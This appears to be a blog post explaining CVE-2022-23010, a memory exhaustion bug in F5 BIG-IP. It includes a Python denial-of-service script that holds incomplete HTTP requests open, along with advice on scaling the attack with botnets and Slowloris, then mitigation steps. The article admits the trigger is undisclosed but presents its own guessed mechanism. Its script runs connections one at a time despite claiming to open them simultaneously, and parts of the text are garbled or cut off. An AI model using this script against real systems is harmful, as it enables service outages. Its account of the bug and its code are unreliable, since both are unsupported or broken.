CVE-2022-23010 - Exploiting Memory Resource Exhaustion in F5 BIG-IP with FastL4 and HTTP Profiles

Resource exhaustion bugs can be dangerous, often causing performance drops or even full denial of service. CVE-2022-23010 is a high-profile vulnerability impacting several versions of F5 BIG-IP, one of the most widely used application delivery controllers in enterprise environments. If left unpatched, attackers can increase memory usage through crafted requests, potentially bringing down critical services.

In this long read, we’ll break down the nature of this bug, walk through how to reproduce it, provide code snippets demonstrating an attack scenario, and—most importantly—talk about how to fix it. All in clear, everyday English, with exclusive insights.

14.1.x before 14.1.4.4

- All of 13.1.x, 12.1.x, and 11.6.x (including EoTS versions, but support is not provided for those)

Are both attached to the same virtual server

Undisclosed (but malformed or excessive) HTTP requests can trigger excessive memory consumption. Over time, this can affect system stability, leading to slowdowns or outages.

Official Advisory

> F5 Security Advisory K02613237  
> CVE Details Entry: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23010  
> NVD Listing: NIST NVD CVE-2022-23010

Why Does This Happen?

The bug is triggered by the unusual combination of a FastL4 profile and an HTTP profile on a single virtual server.

- FastL4 is designed to accelerate traffic at the transport layer (TCP/UDP).
- HTTP profile enables Layer 7 processing, such as inspecting HTTP headers, handling persistence, etc.

When both profiles are present, an attacker can send HTTP requests in unexpected ways, causing BIG-IP to mishandle memory allocation for those requests.

BIG-IP will then, under attack, fail to clean up the allocated memory, resulting in memory resource exhaustion. This can impact all traffic, not just the attacker's.

Exploit Walkthrough

Here’s an example of how a pen tester or attacker might exploit this vulnerability.

Identify a target BIG-IP system matching a vulnerable version.

- Confirm (via error messages or HTTP headers like Server: BigIP and scanning tools) that a virtual server is using both FastL4 and HTTP profiles.

Use a tool to send a large number of malformed or incomplete HTTP requests to the virtual server.

- Because the requests are not handled or cleaned up properly, each one increases memory use on the target.
   - The attacker repeats this in a loop, causing the BIG-IP device to gradually run out of resources, resulting in degraded performance or denial of service (DoS).

Proof-of-Concept (PoC) Attack Script

Here’s a Python script that simulates the attack by sending incomplete HTTP requests. You can use netcat or telnet for similar tests, but Python allows you to automate the load.

> Disclaimer: Only test this on systems you own or are authorized to assess.

import socket
import time

TARGET_IP = '192.168.100.100'  # Replace with target BIG-IP IP
TARGET_PORT = 80               # Default HTTP port, adjust if needed
REQUEST = b"GET / HTTP/1.1\r\nHost: vulnerable.server\r\n"  # incomplete request!

def hammer(target_ip, target_port):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, target_port))
        s.sendall(REQUEST)
        # Do not send the extra \r\n to finish the HTTP request
        # This leaves the connection hanging, consuming resources
        time.sleep(60)  # Keep the connection open for 60 seconds
        s.close()
    except Exception as e:
        print("Error:", e)

# Open a bunch of simultaneous connections
for _ in range(100):
    hammer(TARGET_IP, TARGET_PORT)

What this does

- Sends many incomplete HTTP requests (each missing the final newline that terminates the HTTP request),

Amplifying the Attack

For maximum impact, attackers often use distributed botnets to launch thousands of simultaneous connections. Tools like Slowloris can be adapted to automate these attacks at scale.

Check system health:

- Monitor logs (/var/log/ltm) and resources (tmsh show sys memory).

Mitigation and Remediation

F5 recommends upgrading to a fixed version:

14.1.x: Upgrade to 14.1.4.4 or later

- 13.1.x / 12.1.x / 11.6.x: No fix (EoTS — End of Technical Support). Strongly recommend upgrading to a supported version.

Limit connections using connection limits in your virtual server configuration.

- Deploy external rate-limiting (firewall, WAF, or intrusion detection system) to filter abusive requests.

References

- F5 official advisory
- NVD CVE-2022-23010 Details

Conclusion

*CVE-2022-23010* is a classic example of how combining configuration options can create unexpected (and dangerous) results. By using features in a particular way (combining FastL4 and HTTP profiles on one virtual server), attackers can destabilize F5 BIG-IP systems. This can disrupt not just websites, but potentially core services for an entire business.

Takeaway:  
If you manage BIG-IP devices, audit your configurations immediately. Remove unnecessary profiles, upgrade to fixed versions, and monitor for abnormal memory use. Don't wait for a real outage to discover you’re vulnerable.


Exclusive Tip:  
Many organizations are running BIG-IP in ways that haven't been reviewed in years. Use this as an opportunity to review all your virtual server profiles. Removing unused or risky configurations not only protects you from CVE-2022-23010, but from future bugs too.


> For more details, visit the official F5 knowledge base and the CVE record. For hands-on defenders, tools like Slowloris are handy for testing if your changes are effective.

*Stay updated, stay protected!*

If you have questions or want a deeper dive, let me know in the comments or reach out directly.

Timeline

Published on: 01/25/2022 20:15:00 UTC
Last modified on: 02/01/2022 17:21:00 UTC